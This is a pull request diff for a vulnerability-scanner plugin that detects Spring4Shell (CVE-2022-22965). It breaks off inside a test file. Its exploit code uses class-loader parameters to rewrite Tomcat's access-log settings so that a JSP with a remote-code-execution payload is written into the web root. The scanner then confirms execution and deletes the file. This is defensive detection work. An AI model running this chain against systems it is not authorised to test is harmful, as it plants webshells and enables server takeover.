### PR TITLE
Better Spring4Shell detection logic

### DIFF
--- a/community/detectors/spring_framework_cve_2022_22965/build.gradle
+++ b/community/detectors/spring_framework_cve_2022_22965/build.gradle
@@ -48,10 +48,10 @@ ext {
     okhttpVersion = '3.12.0'
     autoValueVersion = '1.7'
     tsunamiVersion = 'latest.release'
-    junitVersion = '4.13'
+    junitVersion = '4.13.1'
     mockitoVersion = '2.28.2'
     truthVersion = '1.0.1'
-    jsoupVersion = '1.9.2'
+    guiceVersion = '4.2.3'
 }
 
 dependencies {
@@ -63,10 +63,10 @@ dependencies {
 
     testImplementation "junit:junit:${junitVersion}"
     testImplementation "org.mockito:mockito-core:${mockitoVersion}"
+    testImplementation "com.google.inject:guice:${guiceVersion}"
     testImplementation "com.google.truth:truth:${truthVersion}"
+    testImplementation "com.google.inject.extensions:guice-testlib:${guiceVersion}"
     testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}"
     testImplementation "com.google.truth.extensions:truth-proto-extension:${truthVersion}"
     testImplementation "com.squareup.okhttp3:mockwebserver:${okhttpVersion}"
-
-    implementation "org.jsoup:jsoup:${jsoupVersion}"
 }

--- a/community/detectors/spring_framework_cve_2022_22965/src/main/java/com/google/tsunami/plugins/detectors/spring/SpringCve202222965Detector.java
+++ b/community/detectors/spring_framework_cve_2022_22965/src/main/java/com/google/tsunami/plugins/detectors/spring/SpringCve202222965Detector.java
@@ -212,7 +212,7 @@ public final class SpringCve202222965Detector implements VulnDetector {
       // Setting and unsetting the fileDateFormat field allows for executing the exploit multiple times
       // If re-running the exploit, this will create an artifact of {old_file_name}_.jsp
       // Running this in case there already was an exploit attempt on this instance
-      Uninterruptibles.sleepUninterruptibly(Duration.ofSeconds(10));
+      Uninterruptibles.sleepUninterruptibly(Duration.ofSeconds(3));
       httpClient.send(
               HttpRequest.builder()
                       .setMethod(httpMethod)
@@ -221,17 +221,6 @@ public final class SpringCve202222965Detector implements VulnDetector {
                       .build(),
               networkService
       );
-      Uninterruptibles.sleepUninterruptibly(Duration.ofSeconds(10));
-      httpClient.send(
-              HttpRequest.builder()
-                      .setMethod(HttpMethod.GET)
-                      .setUrl(targetUri)
-                      .setHeaders(httpHeaders)
-                      .build(),
-              networkService
-      );
-
-      Uninterruptibles.sleepUninterruptibly(Duration.ofSeconds(10));
 
       // Generate JSP content
       logger.atInfo().log("Setting log configuration to write JSP file.");
@@ -254,7 +243,7 @@ public final class SpringCve202222965Detector implements VulnDetector {
       );
 
       // Wait for changes to propagate
-      Uninterruptibles.sleepUninterruptibly(Duration.ofSeconds(10));
+      Uninterruptibles.sleepUninterruptibly(Duration.ofSeconds(3));
 
       // Send an arbitrary request to trigger the file writing
       // The headers are needed to generate the content correctly
@@ -272,25 +261,9 @@ public final class SpringCve202222965Detector implements VulnDetector {
                       .build(),
               networkService
       );
-      httpClient.send(
-              HttpRequest.builder()
-                      .setMethod(HttpMethod.GET)
-                      .setUrl(targetUri)
-                      .setHeaders(headers)
-                      .build(),
-              networkService
-      );
-      httpClient.send(
-              HttpRequest.builder()
-                      .setMethod(HttpMethod.GET)
-                      .setUrl(targetUri)
-                      .setHeaders(headers)
-                      .build(),
-              networkService
-      );
 
       // Wait for file to be written
-      Uninterruptibles.sleepUninterruptibly(Duration.ofSeconds(10));
+      Uninterruptibles.sleepUninterruptibly(Duration.ofSeconds(3));
 
       // Reset the pattern to prevent further data being written to the file
       logger.atInfo().log("Resetting log configuration.");
@@ -302,6 +275,9 @@ public final class SpringCve202222965Detector implements VulnDetector {
                       .build(),
               networkService
       );
+
+      Uninterruptibles.sleepUninterruptibly(Duration.ofSeconds(3));
+
     } catch (IOException e) {
       return false;
     }
@@ -331,10 +307,6 @@ public final class SpringCve202222965Detector implements VulnDetector {
                         .build(),
                 networkService
         );
-
-        if (response.status() == HttpStatus.OK) {
-          logger.atInfo().log("==================== " + response.bodyString().get());
-        }
 
         if (
                 response.status() == HttpStatus.OK

--- a/community/detectors/spring_framework_cve_2022_22965/src/main/java/com/google/tsunami/plugins/detectors/spring/SpringCve202222965Detector.java
+++ b/community/detectors/spring_framework_cve_2022_22965/src/main/java/com/google/tsunami/plugins/detectors/spring/SpringCve202222965Detector.java
@@ -18,7 +18,6 @@ package com.google.tsunami.plugins.detectors.spring;
 import static com.google.common.base.Preconditions.checkNotNull;
 import static com.google.common.collect.ImmutableList.toImmutableList;
 import static com.google.tsunami.common.net.http.HttpRequest.get;
-import static com.google.tsunami.common.net.http.HttpRequest.post;
 
 import com.google.common.collect.ImmutableList;
 import com.google.common.collect.ImmutableMap;
@@ -60,6 +59,7 @@ import java.util.ArrayList;
 import java.util.HashMap;
 import java.util.List;
 import java.util.Map;
+import java.util.Objects;
 import javax.inject.Inject;
 
 /** A {@link VulnDetector} that detects Spring Framework RCE(CVE-2022-22965) */
@@ -286,7 +286,7 @@ public final class SpringCve202222965Detector implements VulnDetector {
     urlsToCheck.add(tempUrl + JSP_FILENAME + ".jsp");
 
     // The JSP file may be in any subpath from our original target URI
-    List<String> pathSegments = HttpUrl.parse(targetUri).pathSegments();
+    List<String> pathSegments = Objects.requireNonNull(HttpUrl.parse(targetUri)).pathSegments();
     if (pathSegments.size() > 1) {
       for(String segment: pathSegments) {
         tempUrl += segment + "/";
@@ -334,7 +334,6 @@ public final class SpringCve202222965Detector implements VulnDetector {
         }
       } catch (IOException e) {
         logger.atWarning().withCause(e).log("Unable to query '%s'.", url);
-        continue;
       }
     }
     logger.atWarning().log("Could not find any uploaded JSP file. Target is probably not vulnerable.");

--- a/community/detectors/spring_framework_cve_2022_22965/src/main/java/com/google/tsunami/plugins/detectors/spring/SpringCve202222965Detector.java
+++ b/community/detectors/spring_framework_cve_2022_22965/src/main/java/com/google/tsunami/plugins/detectors/spring/SpringCve202222965Detector.java
@@ -21,28 +21,45 @@ import static com.google.tsunami.common.net.http.HttpRequest.get;
 import static com.google.tsunami.common.net.http.HttpRequest.post;
 
 import com.google.common.collect.ImmutableList;
+import com.google.common.collect.ImmutableMap;
 import com.google.common.flogger.GoogleLogger;
+import com.google.common.util.concurrent.Uninterruptibles;
 import com.google.protobuf.util.Timestamps;
 import com.google.tsunami.common.data.NetworkServiceUtils;
 import com.google.tsunami.common.net.http.HttpClient;
+import com.google.tsunami.common.net.http.HttpHeaders;
+import com.google.tsunami.common.net.http.HttpMethod;
+import com.google.tsunami.common.net.http.HttpRequest;
 import com.google.tsunami.common.net.http.HttpResponse;
 import com.google.tsunami.common.net.http.HttpStatus;
 import com.google.tsunami.common.time.UtcClock;
 import com.google.tsunami.plugin.PluginType;
 import com.google.tsunami.plugin.VulnDetector;
 import com.google.tsunami.plugin.annotations.PluginInfo;
+import com.google.tsunami.plugin.payload.Payload;
+import com.google.tsunami.plugin.payload.PayloadGenerator;
 import com.google.tsunami.proto.CrawlResult;
 import com.google.tsunami.proto.DetectionReport;
 import com.google.tsunami.proto.DetectionReportList;
 import com.google.tsunami.proto.DetectionStatus;
 import com.google.tsunami.proto.NetworkService;
+import com.google.tsunami.proto.PayloadGeneratorConfig;
 import com.google.tsunami.proto.Severity;
 import com.google.tsunami.proto.TargetInfo;
 import com.google.tsunami.proto.Vulnerability;
 import com.google.tsunami.proto.VulnerabilityId;
+import okhttp3.HttpUrl;
+
 import java.io.IOException;
+import java.net.URLEncoder;
+import java.nio.charset.StandardCharsets;
 import java.time.Clock;
+import java.time.Duration;
 import java.time.Instant;
+import java.util.ArrayList;
+import java.util.HashMap;
+import java.util.List;
+import java.util.Map;
 import javax.inject.Inject;
 
 /** A {@link VulnDetector} that detects Spring Framework RCE(CVE-2022-22965) */
@@ -56,18 +73,33 @@ import javax.inject.Inject;
 public final class SpringCve202222965Detector implements VulnDetector {
 
   private static final GoogleLogger logger = GoogleLogger.forEnclosingClass();
-  private static final String VULNERABILITY_PAYLOAD_STRING_1 =
-      "class.module.classLoader.DefaultAssertionStatus=1";
-  private static final String VULNERABILITY_PAYLOAD_STRING_2 =
-      "class.module.classLoader.DefaultAssertionStatus=2";
+  private static final String PRELIMINARY_CHECK_PARAM =
+      "class.module.classLoader.DefaultAssertionStatus";
+  // A payload to append to the JSP file that will allow to delete the file itself
+  private static final String JSP_CONTENT_TEMPLATE =
+          "<%@ page import=\"java.io.File\" %>\n{{PAYLOAD}}\n<% if(\"1\".equals(request.getParameter(\"delete\"))){ File thisFile=new File(application.getRealPath(request.getServletPath())); thisFile.delete(); out.println(\"Deleted\"); } %>//";
+  private static final String JSP_FILENAME = "Tsunami" + System.currentTimeMillis();
+
+  private static final Map<String, String> LOG_CONFIG_PARAMS = ImmutableMap.of(
+          "class.module.classLoader.resources.context.parent.pipeline.first.suffix", ".jsp",
+          "class.module.classLoader.resources.context.parent.pipeline.first.directory", "webapps/ROOT",
+          "class.module.classLoader.resources.context.parent.pipeline.first.prefix", JSP_FILENAME,
+          "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat", ""
+  );
+  private static final String LOG_FILE_DATE_FORMAT_QS = "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=_";
+  private static final String LOG_PATTERN_PARAM = "class.module.classLoader.resources.context.parent.pipeline.first.pattern";
+
 
   private final Clock utcClock;
   private final HttpClient httpClient;
+  private final PayloadGenerator payloadGenerator;
+
 
   @Inject
-  SpringCve202222965Detector(@UtcClock Clock utcClock, HttpClient httpClient) {
+  SpringCve202222965Detector(@UtcClock Clock utcClock, HttpClient httpClient, PayloadGenerator payloadGenerator) {
     this.utcClock = checkNotNull(utcClock);
     this.httpClient = checkNotNull(httpClient);
+    this.payloadGenerator = checkNotNull(payloadGenerator);
   }
 
   @Override
@@ -84,61 +116,249 @@ public final class SpringCve202222965Detector implements VulnDetector {
   }
 
   private boolean isServiceVulnerable(NetworkService networkService) {
-    if (proofOfConcept(
-        NetworkServiceUtils.buildWebApplicationRootUrl(networkService), "GET", networkService)) {
+    // Check root URL
+    if (check(
+        NetworkServiceUtils.buildWebApplicationRootUrl(networkService), HttpMethod.GET, networkService)) {
       return true;
     }
-    if (networkService.getServiceContext().getWebServiceContext().getCrawlResultsCount() == 0) {
-      return false;
-    }
+
+    // Check crawled pages
     for (CrawlResult crawlResult :
         networkService.getServiceContext().getWebServiceContext().getCrawlResultsList()) {
       String targetUri = crawlResult.getCrawlTarget().getUrl();
-      String httpMethod = crawlResult.getCrawlTarget().getHttpMethod();
-      if (proofOfConcept(targetUri, httpMethod, networkService)) {
+      HttpMethod httpMethod = HttpMethod.valueOf(crawlResult.getCrawlTarget().getHttpMethod());
+      if (check(targetUri, httpMethod, networkService)) {
         return true;
       }
     }
     return false;
   }
 
-  private boolean proofOfConcept(
-      String targetUri, String httpMethod, NetworkService networkService) {
-    HttpResponse firstPoCResponse;
-    HttpResponse secondPoCResponse;
+  private boolean check(String targetUri, HttpMethod httpMethod, NetworkService networkService) {
+    if (!preliminaryCheck(targetUri, httpMethod, networkService)) {
+      return false;
+    }
+
+    logger.atInfo().log("Preliminary check returned positive for %s", targetUri);
+    return exploit(targetUri, httpMethod, networkService);
+  }
+
+  private boolean preliminaryCheck(
+      String targetUri, HttpMethod httpMethod, NetworkService networkService) {
+    /*
+    This method will try a preliminary detection method without running the full exploit.
+    Since DefaultAssertionStatus is a boolean, setting it to 1 should not return any error,
+    but trying to set it to 2 should return a BAD REQUEST error.
+     */
     try {
-      switch (httpMethod) {
-        case "GET":
-          firstPoCResponse =
-              httpClient.send(
-                  get(targetUri + "?" + VULNERABILITY_PAYLOAD_STRING_1).withEmptyHeaders().build(),
-                  networkService);
-          secondPoCResponse =
-              httpClient.send(
-                  get(targetUri + "?" + VULNERABILITY_PAYLOAD_STRING_2).withEmptyHeaders().build(),
-                  networkService);
-          break;
-        case "POST":
-          firstPoCResponse =
-              httpClient.send(
-                  post(targetUri + "?" + VULNERABILITY_PAYLOAD_STRING_1).withEmptyHeaders().build(),
-                  networkService);
-          secondPoCResponse =
-              httpClient.send(
-                  post(targetUri + "?" + VULNERABILITY_PAYLOAD_STRING_2).withEmptyHeaders().build(),
-                  networkService);
-          break;
-        default:
-          logger.atWarning().log("Unable to query '%s'.", targetUri);
-          return false;
+      HttpRequest request = HttpRequest.builder()
+              .setMethod(httpMethod)
+              .setUrl(targetUri + "?" + PRELIMINARY_CHECK_PARAM + "=1")
+              .withEmptyHeaders()
+              .build();
+
+      if (httpClient.send(request, networkService).status() != HttpStatus.OK) {
+        return false;
       }
-      if (firstPoCResponse.status() == HttpStatus.OK
-          && secondPoCResponse.status() == HttpStatus.BAD_REQUEST) {
+
+      request = HttpRequest.builder()
+              .setMethod(httpMethod)
+              .setUrl(targetUri + "?" + PRELIMINARY_CHECK_PARAM + "=2")
+              .withEmptyHeaders()
+              .build();
+
+      if (httpClient.send(request, networkService).status() == HttpStatus.BAD_REQUEST) {
         return true;
       }
     } catch (IOException e) {
       logger.atWarning().withCause(e).log("Unable to query '%s'.", targetUri);
     }
+    return false;
+  }
+
+  private static String buildQueryString(Map<String, String> parameters) {
+    List<String> params = new ArrayList<>(parameters.size());
+    for (Map.Entry<String, String> entry : parameters.entrySet()) {
+      params.add(String.format("%s=%s", entry.getKey(), URLEncoder.encode(entry.getValue(), StandardCharsets.UTF_8)));
+    }
+    return String.join("&", params);
+  }
+
+
+  private boolean exploit(String targetUri, HttpMethod httpMethod, NetworkService networkService) {
+    // Generate JSP content
+    PayloadGeneratorConfig payloadGeneratorConfig = PayloadGeneratorConfig.newBuilder()
+            .setExecutionEnvironment(PayloadGeneratorConfig.ExecutionEnvironment.EXEC_INTERPRETATION_ENVIRONMENT)
+            .setInterpretationEnvironment(PayloadGeneratorConfig.InterpretationEnvironment.JSP)
+            .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.REFLECTIVE_RCE)
+            .build();
+
+    Payload payload = this.payloadGenerator.generate(payloadGeneratorConfig);
+
+    return uploadJsp(targetUri, httpMethod, networkService, payload) && checkUploadedJsp(targetUri, networkService, payload);
+  }
+
+  private boolean uploadJsp(String targetUri, HttpMethod httpMethod, NetworkService networkService, Payload payload) {
+    /*
+     From https://github.com/lunasec-io/Spring4Shell-POC/blob/master/exploit.py
+     The exploit involves modifying the logs configuration to write a JSP file in
+     Tomcat's root directory. The file is written on the request AFTER the one setting
+     the configuration.
+     */
+
+    HttpHeaders httpHeaders = HttpHeaders.builder().addHeader("Connection", "close").build();
+
+    try {
+      // Setting and unsetting the fileDateFormat field allows for executing the exploit multiple times
+      // If re-running the exploit, this will create an artifact of {old_file_name}_.jsp
+      // Running this in case there already was an exploit attempt on this instance
+      Uninterruptibles.sleepUninterruptibly(Duration.ofSeconds(10));
+      httpClient.send(
+              HttpRequest.builder()
+                      .setMethod(httpMethod)
+                      .setUrl(targetUri + "?" + LOG_FILE_DATE_FORMAT_QS)
+                      .setHeaders(httpHeaders)
+                      .build(),
+              networkService
+      );
+      Uninterruptibles.sleepUninterruptibly(Duration.ofSeconds(10));
+      httpClient.send(
+              HttpRequest.builder()
+                      .setMethod(HttpMethod.GET)
+                      .setUrl(targetUri)
+                      .setHeaders(httpHeaders)
+                      .build(),
+              networkService
+      );
+
+      Uninterruptibles.sleepUninterruptibly(Duration.ofSeconds(10));
+
+      // Generate JSP content
+      logger.atInfo().log("Setting log configuration to write JSP file.");
+      String jspContent = JSP_CONTENT_TEMPLATE
+              .replace("{{PAYLOAD}}", payload.getPayload())
+              .replace("%", "%{perc}i")
+              .replace("Runtime", "%{rt}i");
+
+      Map<String, String> params = new HashMap<>(LOG_CONFIG_PARAMS);
+      params.put(LOG_PATTERN_PARAM, jspContent);
+
+      // Modifying logs configuration
+      httpClient.send(
+              HttpRequest.builder()
+                      .setMethod(httpMethod)
+                      .setUrl(targetUri + "?" + buildQueryString(params))
+                      .setHeaders(httpHeaders)
+                      .build(),
+              networkService
+      );
+
+      // Wait for changes to propagate
+      Uninterruptibles.sleepUninterruptibly(Duration.ofSeconds(10));
+
+      // Send an arbitrary request to trigger the file writing
+      // The headers are needed to generate the content correctly
+      logger.atInfo().log("Triggering JSP file write.");
+      HttpHeaders headers = HttpHeaders.builder()
+                      .addHeader("perc", "%")
+                      .addHeader("rt", "Runtime")
+                      .addHeader("Connection", "close")
+                      .build();
+      httpClient.send(
+              HttpRequest.builder()
+                      .setMethod(HttpMethod.GET)
+                      .setUrl(targetUri)
+                      .setHeaders(headers)
+                      .build(),
+              networkService
+      );
+      httpClient.send(
+              HttpRequest.builder()
+                      .setMethod(HttpMethod.GET)
+                      .setUrl(targetUri)
+                      .setHeaders(headers)
+                      .build(),
+              networkService
+      );
+      httpClient.send(
+              HttpRequest.builder()
+                      .setMethod(HttpMethod.GET)
+                      .setUrl(targetUri)
+                      .setHeaders(headers)
+                      .build(),
+              networkService
+      );
+
+      // Wait for file to be written
+      Uninterruptibles.sleepUninterruptibly(Duration.ofSeconds(10));
+
+      // Reset the pattern to prevent further data being written to the file
+      logger.atInfo().log("Resetting log configuration.");
+      httpClient.send(
+              HttpRequest.builder()
+                      .setMethod(httpMethod)
+                      .setUrl(targetUri + "?" + LOG_PATTERN_PARAM + "=")
+                      .setHeaders(httpHeaders)
+                      .build(),
+              networkService
+      );
+    } catch (IOException e) {
+      return false;
+    }
+    return true;
+  }
+
+  private boolean checkUploadedJsp(String targetUri, NetworkService networkService, Payload payload) {
+    List<String> urlsToCheck = new ArrayList<>();
+    String tempUrl = NetworkServiceUtils.buildWebApplicationRootUrl(networkService);
+    urlsToCheck.add(tempUrl + JSP_FILENAME + ".jsp");
+
+    // The JSP file may be in any subpath from our original target URI
+    List<String> pathSegments = HttpUrl.parse(targetUri).pathSegments();
+    if (pathSegments.size() > 1) {
+      for(String segment: pathSegments) {
+        tempUrl += segment + "/";
+        urlsToCheck.add(String.format("%s%s.jsp", tempUrl, JSP_FILENAME));
+      }
+    }
+
+    HttpHeaders httpHeaders = HttpHeaders.builder().addHeader("Connection", "close").build();
+    for (String url : urlsToCheck) {
+      try {
+        HttpResponse response = httpClient.send(
+                get(url)
+                        .setHeaders(httpHeaders)
+                        .build(),
+                networkService
+        );
+
+        if (response.status() == HttpStatus.OK) {
+          logger.atInfo().log("==================== " + response.bodyString().get());
+        }
+
+        if (
+                response.status() == HttpStatus.OK
+                && payload.checkIfExecuted(response.bodyString().orElse(""))
+        ) {
+          logger.atInfo().log("Vulnerability confirmed via JSP file uploaded at %s", url);
+
+          // Cleanup
+          logger.atInfo().log("Triggering JSP file deletion.");
+          httpClient.send(
+                  get(url + "?delete=1")
+                          .setHeaders(httpHeaders)
+                          .build(),
+                  networkService
+          );
+
+          return true;
+        }
+      } catch (IOException e) {
+        logger.atWarning().withCause(e).log("Unable to query '%s'.", url);
+        continue;
+      }
+    }
+    logger.atWarning().log("Could not find any uploaded JSP file. Target is probably not vulnerable.");
     return false;
   }
 

--- a/community/detectors/spring_framework_cve_2022_22965/src/main/java/com/google/tsunami/plugins/detectors/spring/SpringCve202222965Detector.java
+++ b/community/detectors/spring_framework_cve_2022_22965/src/main/java/com/google/tsunami/plugins/detectors/spring/SpringCve202222965Detector.java
@@ -78,13 +78,17 @@ public final class SpringCve202222965Detector implements VulnDetector {
   // A payload to append to the JSP file that will allow to delete the file itself
   private static final String JSP_CONTENT_TEMPLATE =
           "<%@ page import=\"java.io.File\" %>\n{{PAYLOAD}}\n<% if(\"1\".equals(request.getParameter(\"delete\"))){ File thisFile=new File(application.getRealPath(request.getServletPath())); thisFile.delete(); out.println(\"Deleted\"); } %>//";
-  private static final String JSP_FILENAME = "Tsunami" + System.currentTimeMillis();
+
+  // It's important that fileDateFormat is never the same to be able to trigger the exploit more than once.
+  private static final String JSP_FILENAME_SUFFIX = String.valueOf(System.currentTimeMillis());
+  private static final String JSP_FILENAME_PREFIX = "Tsunami_";
+  private static final String JSP_FILENAME = JSP_FILENAME_PREFIX + JSP_FILENAME_SUFFIX;
 
   private static final Map<String, String> LOG_CONFIG_PARAMS = ImmutableMap.of(
           "class.module.classLoader.resources.context.parent.pipeline.first.suffix", ".jsp",
           "class.module.classLoader.resources.context.parent.pipeline.first.directory", "webapps/ROOT",
-          "class.module.classLoader.resources.context.parent.pipeline.first.prefix", JSP_FILENAME,
-          "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat", ""
+          "class.module.classLoader.resources.context.parent.pipeline.first.prefix", JSP_FILENAME_PREFIX,
+          "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat", JSP_FILENAME_SUFFIX
   );
   private static final String LOG_FILE_DATE_FORMAT_QS = "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=_";
   private static final String LOG_PATTERN_PARAM = "class.module.classLoader.resources.context.parent.pipeline.first.pattern";
@@ -209,19 +213,6 @@ public final class SpringCve202222965Detector implements VulnDetector {
     HttpHeaders httpHeaders = HttpHeaders.builder().addHeader("Connection", "close").build();
 
     try {
-      // Setting and unsetting the fileDateFormat field allows for executing the exploit multiple times
-      // If re-running the exploit, this will create an artifact of {old_file_name}_.jsp
-      // Running this in case there already was an exploit attempt on this instance
-      Uninterruptibles.sleepUninterruptibly(Duration.ofSeconds(3));
-      httpClient.send(
-              HttpRequest.builder()
-                      .setMethod(httpMethod)
-                      .setUrl(targetUri + "?" + LOG_FILE_DATE_FORMAT_QS)
-                      .setHeaders(httpHeaders)
-                      .build(),
-              networkService
-      );
-
       // Generate JSP content
       logger.atInfo().log("Setting log configuration to write JSP file.");
       String jspContent = JSP_CONTENT_TEMPLATE
@@ -276,8 +267,6 @@ public final class SpringCve202222965Detector implements VulnDetector {
               networkService
       );
 
-      Uninterruptibles.sleepUninterruptibly(Duration.ofSeconds(3));
-
     } catch (IOException e) {
       return false;
     }
@@ -301,17 +290,28 @@ public final class SpringCve202222965Detector implements VulnDetector {
     HttpHeaders httpHeaders = HttpHeaders.builder().addHeader("Connection", "close").build();
     for (String url : urlsToCheck) {
       try {
-        HttpResponse response = httpClient.send(
-                get(url)
-                        .setHeaders(httpHeaders)
-                        .build(),
-                networkService
+        HttpResponse response;
+        int max_attempts = 5;
+        int attempt = 0;
+        boolean executed;
+        // If we get a 200, retry the request a few times as sometimes the contents haven't been written yet
+        do {
+          Uninterruptibles.sleepUninterruptibly(Duration.ofSeconds(3));
+          response = httpClient.send(
+                  get(url)
+                          .setHeaders(httpHeaders)
+                          .build(),
+                  networkService
+          );
+          executed = payload.checkIfExecuted(response.bodyString().orElse(""));
+        } while (
+                response.status() == HttpStatus.OK
+                        && !executed
+                        && attempt++ < max_attempts
         );
 
-        if (
-                response.status() == HttpStatus.OK
-                && payload.checkIfExecuted(response.bodyString().orElse(""))
-        ) {
+
+        if (executed) {
           logger.atInfo().log("Vulnerability confirmed via JSP file uploaded at %s", url);
 
           // Cleanup

--- a/community/detectors/spring_framework_cve_2022_22965/src/main/java/com/google/tsunami/plugins/detectors/spring4shell/Annotations.java
+++ b/community/detectors/spring_framework_cve_2022_22965/src/main/java/com/google/tsunami/plugins/detectors/spring4shell/Annotations.java
@@ -1,0 +1,36 @@
+/*
+ * Copyright 2025 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package com.google.tsunami.plugins.detectors.spring4shell;
+
+import static java.lang.annotation.ElementType.FIELD;
+import static java.lang.annotation.ElementType.METHOD;
+import static java.lang.annotation.ElementType.PARAMETER;
+
+import java.lang.annotation.Retention;
+import java.lang.annotation.RetentionPolicy;
+import java.lang.annotation.Target;
+import javax.inject.Qualifier;
+
+/** Annotation for {@link SpringCve202222965Detector}. */
+final class Annotations {
+    @Qualifier
+    @Retention(RetentionPolicy.RUNTIME)
+    @Target({PARAMETER, METHOD, FIELD})
+    @interface DelayBetweenRequests {}
+
+    private Annotations() {}
+}

--- a/community/detectors/spring_framework_cve_2022_22965/src/main/java/com/google/tsunami/plugins/detectors/spring4shell/Annotations.java
+++ b/community/detectors/spring_framework_cve_2022_22965/src/main/java/com/google/tsunami/plugins/detectors/spring4shell/Annotations.java
@@ -27,10 +27,10 @@ import javax.inject.Qualifier;
 
 /** Annotation for {@link SpringCve202222965Detector}. */
 final class Annotations {
-    @Qualifier
-    @Retention(RetentionPolicy.RUNTIME)
-    @Target({PARAMETER, METHOD, FIELD})
-    @interface DelayBetweenRequests {}
+  @Qualifier
+  @Retention(RetentionPolicy.RUNTIME)
+  @Target({PARAMETER, METHOD, FIELD})
+  @interface DelayBetweenRequests {}
 
-    private Annotations() {}
+  private Annotations() {}
 }

--- a/community/detectors/spring_framework_cve_2022_22965/src/main/java/com/google/tsunami/plugins/detectors/spring4shell/SpringCve202222965Detector.java
+++ b/community/detectors/spring_framework_cve_2022_22965/src/main/java/com/google/tsunami/plugins/detectors/spring4shell/SpringCve202222965Detector.java
@@ -218,7 +218,7 @@ public final class SpringCve202222965Detector implements VulnDetector {
             .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.REFLECTIVE_RCE)
             .build();
 
-    Payload payload = this.payloadGenerator.generate(payloadGeneratorConfig);
+    Payload payload = this.payloadGenerator.generateNoCallback(payloadGeneratorConfig);
 
     return uploadJsp(targetUri, httpMethod, networkService, payload)
         && checkUploadedJsp(targetUri, networkService, payload);

--- a/community/detectors/spring_framework_cve_2022_22965/src/main/java/com/google/tsunami/plugins/detectors/spring4shell/SpringCve202222965DetectorBootstrapModule.java
+++ b/community/detectors/spring_framework_cve_2022_22965/src/main/java/com/google/tsunami/plugins/detectors/spring4shell/SpringCve202222965DetectorBootstrapModule.java
@@ -1,5 +1,5 @@
 /*
- * Copyright 2022 Google LLC
+ * Copyright 2025 Google LLC
  *
  * Licensed under the Apache License, Version 2.0 (the "License");
  * you may not use this file except in compliance with the License.
@@ -13,8 +13,11 @@
  * See the License for the specific language governing permissions and
  * limitations under the License.
  */
-package com.google.tsunami.plugins.detectors.spring;
+package com.google.tsunami.plugins.detectors.spring4shell;
 
+import static com.google.tsunami.plugins.detectors.spring4shell.Annotations.DelayBetweenRequests;
+
+import com.google.inject.Provides;
 import com.google.tsunami.plugin.PluginBootstrapModule;
 
 /**
@@ -26,5 +29,15 @@ public final class SpringCve202222965DetectorBootstrapModule extends
   @Override
   protected void configurePlugin() {
     registerPlugin(SpringCve202222965Detector.class);
+  }
+
+  @Provides
+  @DelayBetweenRequests
+  int provideDelayBetweenRequests(SpringCve202222965DetectorConfigs configs) {
+    if (configs.delayBetweenRequests == -1) {
+      return 3;
+    }
+
+    return configs.delayBetweenRequests;
   }
 }

--- a/community/detectors/spring_framework_cve_2022_22965/src/main/java/com/google/tsunami/plugins/detectors/spring4shell/SpringCve202222965DetectorBootstrapModule.java
+++ b/community/detectors/spring_framework_cve_2022_22965/src/main/java/com/google/tsunami/plugins/detectors/spring4shell/SpringCve202222965DetectorBootstrapModule.java
@@ -20,11 +20,8 @@ import static com.google.tsunami.plugins.detectors.spring4shell.Annotations.Dela
 import com.google.inject.Provides;
 import com.google.tsunami.plugin.PluginBootstrapModule;
 
-/**
- * A {@link PluginBootstrapModule} for {@link SpringCve202222965Detector}
- */
-public final class SpringCve202222965DetectorBootstrapModule extends
-    PluginBootstrapModule {
+/** A {@link PluginBootstrapModule} for {@link SpringCve202222965Detector} */
+public final class SpringCve202222965DetectorBootstrapModule extends PluginBootstrapModule {
 
   @Override
   protected void configurePlugin() {

--- a/community/detectors/spring_framework_cve_2022_22965/src/main/java/com/google/tsunami/plugins/detectors/spring4shell/SpringCve202222965DetectorConfigs.java
+++ b/community/detectors/spring_framework_cve_2022_22965/src/main/java/com/google/tsunami/plugins/detectors/spring4shell/SpringCve202222965DetectorConfigs.java
@@ -1,0 +1,23 @@
+/*
+ * Copyright 2025 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.spring4shell;
+
+import com.google.tsunami.common.config.annotations.ConfigProperties;
+
+@ConfigProperties("plugins.detectors.spring4shell_detector")
+public class SpringCve202222965DetectorConfigs {
+    int delayBetweenRequests = -1;
+}

--- a/community/detectors/spring_framework_cve_2022_22965/src/main/java/com/google/tsunami/plugins/detectors/spring4shell/SpringCve202222965DetectorConfigs.java
+++ b/community/detectors/spring_framework_cve_2022_22965/src/main/java/com/google/tsunami/plugins/detectors/spring4shell/SpringCve202222965DetectorConfigs.java
@@ -19,5 +19,5 @@ import com.google.tsunami.common.config.annotations.ConfigProperties;
 
 @ConfigProperties("plugins.detectors.spring4shell_detector")
 public class SpringCve202222965DetectorConfigs {
-    int delayBetweenRequests = -1;
+  int delayBetweenRequests = -1;
 }

--- a/community/detectors/spring_framework_cve_2022_22965/src/test/java/com/google/tsunami/plugins/detectors/spring4shell/SpringCve202222965DetectorTest.java
+++ b/community/detectors/spring_framework_cve_2022_22965/src/test/java/com/google/tsunami/plugins/detectors/spring4shell/SpringCve202222965DetectorTest.java
@@ -74,14 +74,15 @@ public final class SpringCve202222965DetectorTest {
 
   private MockWebServer mockWebServer;
   private final SecureRandom testSecureRandom =
-          new SecureRandom() {
-            @Override
-            public void nextBytes(byte[] bytes) {
